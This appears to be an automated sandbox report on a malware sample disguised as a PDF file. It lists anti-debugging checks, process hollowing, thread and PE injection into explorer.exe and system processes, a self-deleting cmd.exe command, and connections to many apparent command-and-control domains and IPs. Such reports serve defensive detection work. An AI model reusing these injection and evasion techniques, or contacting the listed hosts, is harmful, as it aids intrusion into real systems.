Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01172073 mov eax, dword ptr fs:[00000030h]		7_2_01172073
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01181074 mov eax, dword ptr fs:[00000030h]		7_2_01181074
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B9080 mov eax, dword ptr fs:[00000030h]		7_2_010B9080
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01133884 mov eax, dword ptr fs:[00000030h]		7_2_01133884
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01133884 mov eax, dword ptr fs:[00000030h]		7_2_01133884
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C849B mov eax, dword ptr fs:[00000030h]		7_2_010C849B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F90AF mov eax, dword ptr fs:[00000030h]		7_2_010F90AF
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h]		7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h]		7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h]		7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h]		7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h]		7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E20A0 mov eax, dword ptr fs:[00000030h]		7_2_010E20A0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EF0BF mov ecx, dword ptr fs:[00000030h]		7_2_010EF0BF
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EF0BF mov eax, dword ptr fs:[00000030h]		7_2_010EF0BF
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EF0BF mov eax, dword ptr fs:[00000030h]		7_2_010EF0BF
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h]		7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114B8D0 mov ecx, dword ptr fs:[00000030h]		7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h]		7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h]		7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h]		7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114B8D0 mov eax, dword ptr fs:[00000030h]		7_2_0114B8D0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01188CD6 mov eax, dword ptr fs:[00000030h]		7_2_01188CD6
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136CF0 mov eax, dword ptr fs:[00000030h]		7_2_01136CF0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136CF0 mov eax, dword ptr fs:[00000030h]		7_2_01136CF0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01136CF0 mov eax, dword ptr fs:[00000030h]		7_2_01136CF0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B58EC mov eax, dword ptr fs:[00000030h]		7_2_010B58EC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011714FB mov eax, dword ptr fs:[00000030h]		7_2_011714FB
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EA70E mov eax, dword ptr fs:[00000030h]		7_2_010EA70E
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EA70E mov eax, dword ptr fs:[00000030h]		7_2_010EA70E
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114FF10 mov eax, dword ptr fs:[00000030h]		7_2_0114FF10
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114FF10 mov eax, dword ptr fs:[00000030h]		7_2_0114FF10
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0117131B mov eax, dword ptr fs:[00000030h]		7_2_0117131B
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0118070D mov eax, dword ptr fs:[00000030h]		7_2_0118070D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0118070D mov eax, dword ptr fs:[00000030h]		7_2_0118070D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DF716 mov eax, dword ptr fs:[00000030h]		7_2_010DF716
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B4F2E mov eax, dword ptr fs:[00000030h]		7_2_010B4F2E
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B4F2E mov eax, dword ptr fs:[00000030h]		7_2_010B4F2E
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EE730 mov eax, dword ptr fs:[00000030h]		7_2_010EE730
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01188B58 mov eax, dword ptr fs:[00000030h]		7_2_01188B58
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BDB40 mov eax, dword ptr fs:[00000030h]		7_2_010BDB40
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CEF40 mov eax, dword ptr fs:[00000030h]		7_2_010CEF40
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BF358 mov eax, dword ptr fs:[00000030h]		7_2_010BF358
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BDB60 mov ecx, dword ptr fs:[00000030h]		7_2_010BDB60
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CFF60 mov eax, dword ptr fs:[00000030h]		7_2_010CFF60
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01188F6A mov eax, dword ptr fs:[00000030h]		7_2_01188F6A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E3B7A mov eax, dword ptr fs:[00000030h]		7_2_010E3B7A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E3B7A mov eax, dword ptr fs:[00000030h]		7_2_010E3B7A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C1B8F mov eax, dword ptr fs:[00000030h]		7_2_010C1B8F
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C1B8F mov eax, dword ptr fs:[00000030h]		7_2_010C1B8F
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01137794 mov eax, dword ptr fs:[00000030h]		7_2_01137794
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01137794 mov eax, dword ptr fs:[00000030h]		7_2_01137794
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01137794 mov eax, dword ptr fs:[00000030h]		7_2_01137794
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0116D380 mov ecx, dword ptr fs:[00000030h]		7_2_0116D380
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C8794 mov eax, dword ptr fs:[00000030h]		7_2_010C8794
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2397 mov eax, dword ptr fs:[00000030h]		7_2_010E2397
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0117138A mov eax, dword ptr fs:[00000030h]		7_2_0117138A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EB390 mov eax, dword ptr fs:[00000030h]		7_2_010EB390
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E4BAD mov eax, dword ptr fs:[00000030h]		7_2_010E4BAD
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E4BAD mov eax, dword ptr fs:[00000030h]		7_2_010E4BAD
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E4BAD mov eax, dword ptr fs:[00000030h]		7_2_010E4BAD
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01185BA5 mov eax, dword ptr fs:[00000030h]		7_2_01185BA5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011353CA mov eax, dword ptr fs:[00000030h]		7_2_011353CA
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011353CA mov eax, dword ptr fs:[00000030h]		7_2_011353CA
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DDBE9 mov eax, dword ptr fs:[00000030h]		7_2_010DDBE9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h]		7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h]		7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h]		7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h]		7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h]		7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E03E2 mov eax, dword ptr fs:[00000030h]		7_2_010E03E2
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F37F5 mov eax, dword ptr fs:[00000030h]		7_2_010F37F5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C8A0A mov eax, dword ptr fs:[00000030h]		7_2_010C8A0A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BC600 mov eax, dword ptr fs:[00000030h]		7_2_010BC600
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BC600 mov eax, dword ptr fs:[00000030h]		7_2_010BC600
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BC600 mov eax, dword ptr fs:[00000030h]		7_2_010BC600
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E8E00 mov eax, dword ptr fs:[00000030h]		7_2_010E8E00
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010D3A1C mov eax, dword ptr fs:[00000030h]		7_2_010D3A1C
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EA61C mov eax, dword ptr fs:[00000030h]		7_2_010EA61C
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EA61C mov eax, dword ptr fs:[00000030h]		7_2_010EA61C
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B5210 mov eax, dword ptr fs:[00000030h]		7_2_010B5210
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B5210 mov ecx, dword ptr fs:[00000030h]		7_2_010B5210
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B5210 mov eax, dword ptr fs:[00000030h]		7_2_010B5210
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B5210 mov eax, dword ptr fs:[00000030h]		7_2_010B5210
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BAA16 mov eax, dword ptr fs:[00000030h]		7_2_010BAA16
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BAA16 mov eax, dword ptr fs:[00000030h]		7_2_010BAA16
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01171608 mov eax, dword ptr fs:[00000030h]		7_2_01171608
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F4A2C mov eax, dword ptr fs:[00000030h]		7_2_010F4A2C
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F4A2C mov eax, dword ptr fs:[00000030h]		7_2_010F4A2C
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0116FE3F mov eax, dword ptr fs:[00000030h]		7_2_0116FE3F
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010BE620 mov eax, dword ptr fs:[00000030h]		7_2_010BE620
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01144257 mov eax, dword ptr fs:[00000030h]		7_2_01144257
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B9240 mov eax, dword ptr fs:[00000030h]		7_2_010B9240
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B9240 mov eax, dword ptr fs:[00000030h]		7_2_010B9240
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B9240 mov eax, dword ptr fs:[00000030h]		7_2_010B9240
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B9240 mov eax, dword ptr fs:[00000030h]		7_2_010B9240
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h]		7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h]		7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h]		7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h]		7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h]		7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C7E41 mov eax, dword ptr fs:[00000030h]		7_2_010C7E41
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C766D mov eax, dword ptr fs:[00000030h]		7_2_010C766D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F927A mov eax, dword ptr fs:[00000030h]		7_2_010F927A
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0116B260 mov eax, dword ptr fs:[00000030h]		7_2_0116B260
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0116B260 mov eax, dword ptr fs:[00000030h]		7_2_0116B260
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01188A62 mov eax, dword ptr fs:[00000030h]		7_2_01188A62
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h]		7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h]		7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h]		7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h]		7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010DAE73 mov eax, dword ptr fs:[00000030h]		7_2_010DAE73
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0114FE87 mov eax, dword ptr fs:[00000030h]		7_2_0114FE87
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010ED294 mov eax, dword ptr fs:[00000030h]		7_2_010ED294
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010ED294 mov eax, dword ptr fs:[00000030h]		7_2_010ED294
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h]		7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h]		7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h]		7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h]		7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010B52A5 mov eax, dword ptr fs:[00000030h]		7_2_010B52A5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_011346A7 mov eax, dword ptr fs:[00000030h]		7_2_011346A7
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CAAB0 mov eax, dword ptr fs:[00000030h]		7_2_010CAAB0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010CAAB0 mov eax, dword ptr fs:[00000030h]		7_2_010CAAB0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01180EA5 mov eax, dword ptr fs:[00000030h]		7_2_01180EA5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01180EA5 mov eax, dword ptr fs:[00000030h]		7_2_01180EA5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01180EA5 mov eax, dword ptr fs:[00000030h]		7_2_01180EA5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010EFAB0 mov eax, dword ptr fs:[00000030h]		7_2_010EFAB0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E36CC mov eax, dword ptr fs:[00000030h]		7_2_010E36CC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2ACB mov eax, dword ptr fs:[00000030h]		7_2_010E2ACB
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010F8EC7 mov eax, dword ptr fs:[00000030h]		7_2_010F8EC7
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_01188ED6 mov eax, dword ptr fs:[00000030h]		7_2_01188ED6
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_0116FEC0 mov eax, dword ptr fs:[00000030h]		7_2_0116FEC0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E2AE4 mov eax, dword ptr fs:[00000030h]		7_2_010E2AE4
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010E16E0 mov ecx, dword ptr fs:[00000030h]		7_2_010E16E0
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 7_2_010C76E2 mov eax, dword ptr fs:[00000030h]		7_2_010C76E2

Checks if the current process is being debugged

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe

Code function: 0_2_0045EEE8 VirtualAlloc,LdrInitializeThunk,VirtualAlloc,VirtualProtect,FreeLibrary,LdrInitializeThunk,LdrInitializeThunk,

0_2_0045EEE8

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.sumikkoremon.com
Source: C:\Windows\explorer.exe	Network Connect: 156.235.157.134 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sa-pontianak.com
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.neema.xyz
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 165.32.109.217 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.9etmorea.info
Source: C:\Windows\explorer.exe	Domain query: www.jardingenesis.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: www.era636.com
Source: C:\Windows\explorer.exe	Network Connect: 197.248.5.16 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.217 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 86.105.245.69 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ncgf08.xyz
Source: C:\Windows\explorer.exe	Domain query: www.piiqrio.com
Source: C:\Windows\explorer.exe	Domain query: www.hwkm.net
Source: C:\Windows\explorer.exe	Domain query: www.meishangtianhua.com
Source: C:\Windows\explorer.exe	Domain query: www.tourbox.xyz
Source: C:\Windows\explorer.exe	Network Connect: 163.44.239.73 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 156.67.222.132 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.235.200.145 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.enterprisedaas.computer
Source: C:\Windows\explorer.exe	Domain query: www.localproperty.team
Source: C:\Windows\explorer.exe	Network Connect: 64.69.40.19 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.hbjngs.com
Source: C:\Windows\explorer.exe	Network Connect: 154.81.158.75 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.211 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 68.70.164.19 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.finetipster.com
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.cis136-tgarza.com
Source: C:\Windows\explorer.exe	Network Connect: 23.224.31.114 80			Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 160000			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 970000			Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 4C0000			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 4D0000			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 72480000			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 9F0000			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: A00000			Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 4C0000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 4D0000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 72480000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: 9F0000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory allocated: C:\Windows\SysWOW64\mobsync.exe base: A00000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Memory written: C:\Windows\SysWOW64\mobsync.exe base: 72480000 value starts with: 4D5A			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\logagent.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

Code function: 10_2_0359CB3C CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

10_2_0359CB3C

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\logagent.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 3352			Jump to behavior

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 4D0000			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Thread created: C:\Windows\SysWOW64\mobsync.exe EIP: A00000			Jump to behavior

Contains functionality to inject threads in other processes

Show sources

Source: C:\Users\user\Contacts\Wkklnmcz.exe

Code function: 10_2_035A4660 VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpyA,WriteProcessMemory,CreateRemoteThread,CloseHandle,

10_2_035A4660

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Users\user\Desktop\DOC209272621615.PDF.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe			Jump to behavior
Source: C:\Users\user\Contacts\Wkklnmcz.exe	Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\logagent.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: DOC209272621615.PDF.exe, 00000000.00000000.294385998.0000000000E00000.00000002.00020000.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.296468765.0000000000E00000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.371944518.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.340106101.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.354080918.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.384004278.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000009.00000000.382502777.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000009.00000000.371254382.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000009.00000000.352718938.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000009.00000000.339214687.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: DOC209272621615.PDF.exe, 00000000.00000000.294385998.0000000000E00000.00000002.00020000.sdmp, DOC209272621615.PDF.exe, 00000000.00000000.296468765.0000000000E00000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.391870270.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.371944518.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.340106101.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.354080918.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000009.00000000.384004278.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
